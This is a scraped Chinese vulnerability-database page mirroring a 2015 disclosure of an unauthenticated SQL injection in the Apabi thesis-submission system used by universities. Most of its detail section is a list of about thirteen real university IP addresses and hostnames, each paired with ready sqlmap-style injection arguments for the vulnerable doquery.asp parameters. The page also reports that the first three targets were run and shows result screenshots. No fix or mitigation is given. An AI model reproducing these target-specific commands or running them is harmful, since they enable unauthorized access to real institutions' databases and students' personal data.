某高校在用系统sql注入（打包）（DBA）（无需登录）2

基本字段

漏洞编号：: SSV-95496

披露/发现时间：: 2015-03-16

提交时间：: 2015-03-16

漏洞等级：

漏洞类别：: 其他类型

影响组件：: Apabi

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-0101213

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： 1 ### 详细说明：案例较多，给CNCERT ### 漏洞证明： Apabi论文授权提交系统版权所有© 北京方正阿帕比技术有限公司谷歌搜索：论文授权提交系统北京大学复旦大学什么的都在其中~ [<img src="https://images.seebug.org/upload/201503/1319542601266952db5b97edd2cbc24a55f85c52.png" alt="060814241c327099951e4c60760c02105295ae87.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1319542601266952db5b97edd2cbc24a55f85c52.png) 漏洞文件doquery.asp 漏洞参数：txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate 随便来几个案例 210.44.126.14/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.195.243.37/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.120.121.200/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" pss.uestc.edu.cn/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.203.222.222/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.193.70.164/TASi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.120.227.60/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 59.72.151.17:8000/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.197.127.125/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.199.187.117:8080/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 202.119.83.2/apatasi30/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 218.242.146.229/tasi/admin/query/doquery.asp --data "txtStuName=w&txtStuNo=w&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&check=-1&catalog=-1&authorize=-1&convert=-1&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 前三个跑的结果 [<img src="https://images.seebug.org/upload/201503/131957209d6bcc4612879ef6620b74734c1965bb.png" alt="屏幕截图(984)1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131957209d6bcc4612879ef6620b74734c1965bb.png) [<img src="https://images.seebug.org/upload/201503/131957309b97d02b1e88dd59d2cd267eaa263236.png" alt="屏幕截图(985).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131957309b97d02b1e88dd59d2cd267eaa263236.png) [<img src="https://images.seebug.org/upload/201503/1319573789547f1a22f7b50914923ac8e3cb3c2e.png" alt="屏幕截图(986).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1319573789547f1a22f7b50914923ac8e3cb3c2e.png) [<img src="https://images.seebug.org/upload/201503/13195744f36f2eefd1c53c62c97f8ac7e8a29c0f.png" alt="屏幕截图(987).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195744f36f2eefd1c53c62c97f8ac7e8a29c0f.png) [<img src="https://images.seebug.org/upload/201503/13195752f15cefbfd6abf0a84eaa4225d747d2e8.png" alt="屏幕截图(988).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195752f15cefbfd6abf0a84eaa4225d747d2e8.png) [<img src="https://images.seebug.org/upload/201503/13195759429afc454a4007c1f5283071cd198265.png" alt="屏幕截图(989).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13195759429afc454a4007c1f5283071cd198265.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0101213

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

某高校在用系统sql注入（打包）（DBA）（无需登录）2

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某高校在用系统sql注入（打包）（DBA）（无需登录）2

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定